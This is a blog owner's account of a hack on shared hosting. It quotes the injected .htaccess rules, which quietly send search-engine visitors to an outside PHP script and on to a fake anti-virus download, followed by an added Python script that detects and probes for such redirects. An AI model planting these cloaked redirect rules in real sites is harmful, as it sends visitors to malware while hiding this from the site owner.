So I discovered today that my blog had been hacked – a word that covers a multitude of sins.
This hack was quite clever:
- If you typed a URL in directly, as I would to get to my own site, the site worked as normal.
- If you visited the site from Google (or another search engine), you got redirected to another site, below, that tried to persuade you to download some supposed anti-virus software (which I’m sure was no such thing). I had no idea this was going on, as everything looked fine to me.
[Screenshot of the rogue site visitors were sent to: Not my site …]
It turns out that someone had edited the .htaccess file (a per-directory configuration file for the Apache web server) and made it look like this:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://justrags.com/Swatches/1106/jpg.php [R,L]
So whenever anyone visited my site from one of those search engines, the server automatically redirected them to the justrags.com site – which has a file on it called jpg.php (not an image, but a PHP script named to look like one so the site owner won’t notice it).
That script, in turn, redirects you to thebestantispywarei.com (don’t go there). That site tries to get you to install some alleged anti-virus software, which you definitely shouldn’t.
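As an added example (not part of the original post), here is a small Python check a site owner can run over their own .htaccess to flag exactly this pattern: RewriteCond lines testing %{HTTP_REFERER} followed by a RewriteRule whose target is a URL on another host, which ordinary WordPress rules never do. The sample .htaccess text and the attacker.example host are constructed, and probe_redirect is a hypothetical helper that replays a search-engine Referer against your own site to see where it is sent.

```python
import re
import urllib.error
import urllib.request

# Constructed sample modelled on the rules quoted above; attacker.example is a placeholder host.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://attacker.example/jpg.php [R,L]
# Ordinary WordPress permalink rules: no Referer test, internal target
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""
COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)

def find_referrer_redirects(text):
    """Return [(referer_patterns, target)] for each RewriteRule to another host guarded by Referer tests."""
    findings, pending = [], []  # pending: RewriteCond lines seen since the last RewriteRule
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        cond = COND_RE.match(line)
        if cond:
            pending.append(cond.groups())
            continue
        rule = RULE_RE.match(line)
        if rule:
            target = rule.group(2)
            patterns = [p for var, p in pending if var.upper() == "%{HTTP_REFERER}"]
            if patterns and re.match(r"https?://", target, re.I):  # absolute URL = external redirect
                findings.append((patterns, target))
            pending = []  # RewriteCond lines only apply to the next RewriteRule
    return findings

def probe_redirect(url, referer):
    """Fetch url once with the given Referer; return the Location of a 3xx reply or None (live check)."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # stop urllib following the redirect so we can inspect it
    req = urllib.request.Request(url, headers={"Referer": referer})
    try:
        urllib.request.build_opener(NoRedirect).open(req, timeout=10)
    except urllib.error.HTTPError as err:
        if 300 <= err.code < 400:
            return err.headers.get("Location")
    return None
```

Running probe_redirect("http://yoursite.example/", "http://www.google.com/search?q=test") against your own site should return None; a Location pointing at a host you do not own is the symptom described above.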
It then turned out that my not-yet-finished company site had the same issue.
At first I thought that someone must have managed to get hold of all my passwords (the login details for the two sites are different – so one login can’t access both).
But then I checked out some other sites on my shared server such as:
- www.christchurchsouthcambs.org,
- gingerbeer.co.uk,
- possoft.co.uk and
- bloomsburycleaning.co.uk.
They all had (have, as I write this) the same issue – visits via Google were redirected, but you could get to the site by typing the URL directly.
My web host hasn’t given me a very good explanation of what has happened or what’s going to stop it happening again – clearly the whole server has been compromised.
But, for now, I’ve recreated a normal .htaccess file for a WordPress blog – cobbling one together out of this and this. And the site is back working as normal – with new passwords for the server.